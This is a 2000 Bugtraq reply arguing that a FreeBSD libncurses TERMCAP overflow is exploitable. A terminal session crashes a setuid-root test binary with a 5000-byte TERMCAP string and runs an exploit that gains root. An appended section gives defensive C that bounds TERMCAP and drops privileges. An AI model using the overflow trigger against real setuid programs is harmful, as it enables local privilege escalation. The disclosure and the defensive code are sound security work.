[14665] in bugtraq
Re: freebsd libncurses overflow
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Wed Apr 26 00:19:53 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <002801bfae93$5b7e69a0$0273b6d4@freebsd.lublin.pl>
Date: Tue, 25 Apr 2000 10:50:42 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
X-To: Kris Kennaway <kris@FreeBSD.org>
To: BUGTRAQ@SECURITYFOCUS.COM
> Furthermore, it is not actually a vulnerability. It seems that setuid
> programs will not accept an alternate termcap file via TERMCAP even under
> the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
> only be used on your own binaries.
Sure?
lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1
11:18:54 CET 2000
venglin@lubi.freebsd.lublin.pl:/mnt/elite/usr/src/sys/compile/GADACZKA i386
lubi:venglin:~> cat dupa.c
#include <curses.h>
int main(void) { initscr(); return 0; }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)
Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
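The two defensive points the exchange turns on are that a setuid program should not honour an attacker-controlled TERMCAP at all, and that a terminal description copied into a fixed-size buffer must be length-checked first. The following C is an added example written for this archive page, not code from the post or from ncurses: the bound `TERMCAP_MAX`, the function names and the sample termcap strings are assumptions chosen for illustration, and no curses call is made so the code builds without libncurses.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Assumed bound: classic termcap entries were limited to 1024 bytes, so a
 * description longer than that has no legitimate use and is rejected. */
#define TERMCAP_MAX 1024

/* Bounded string length: counts at most limit + 1 bytes so an oversized
 * value is detected without walking all of it. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n <= limit && s[n] != '\0')
        n++;
    return n;
}

/* Decide whether an environment-supplied terminal description may be used.
 * privileged: non-zero when the process runs with ids it did not inherit
 * from its invoker (setuid/setgid), in which case the value is never
 * trusted. max_len: the largest description the caller's buffer can hold.
 * Returns 1 if the value may be honoured, 0 if it must be ignored. */
int termcap_env_allowed(const char *value, int privileged, size_t max_len)
{
    if (value == NULL)
        return 0;
    if (privileged)
        return 0;                       /* setuid binary: fall back to the system database */
    if (bounded_len(value, max_len) > max_len)
        return 0;                       /* would overflow a fixed-size buffer */
    return 1;
}

/* Copy a terminal description into a fixed buffer only after it passed the
 * checks above. Returns 0 on success, -1 if the value was rejected (the
 * buffer is then left empty so nothing stale is parsed). */
int termcap_copy(char *dst, size_t dstlen, const char *value, int privileged)
{
    if (dst == NULL || dstlen == 0)
        return -1;
    if (!termcap_env_allowed(value, privileged, dstlen - 1)) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, value, strlen(value) + 1); /* length already verified to fit */
    return 0;
}

/* Is the process holding privileges beyond those of the user who ran it? */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* The pattern the post's closing sentence describes: a setuid program gives
 * up its elevated ids before any terminal handling touches the environment.
 * Returns 0 on success, -1 if the ids could not be dropped. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    return running_privileged() ? -1 : 0;
}

int main(void)
{
    char buf[TERMCAP_MAX + 1];
    if (drop_privileges() != 0)
        return 1;
    /* Only after privileges are dropped is an environment value consulted. */
    return termcap_copy(buf, sizeof buf, "xterm:co#80:li#24:", running_privileged()) == 0 ? 0 : 1;
}
```

In a real program the `privileged` argument would come from `running_privileged()` (or `issetugid()` on BSDs) before any library call that reads the environment; a library that applies the same two checks makes the 5000-byte TERMCAP from the session above a rejected value rather than a crash.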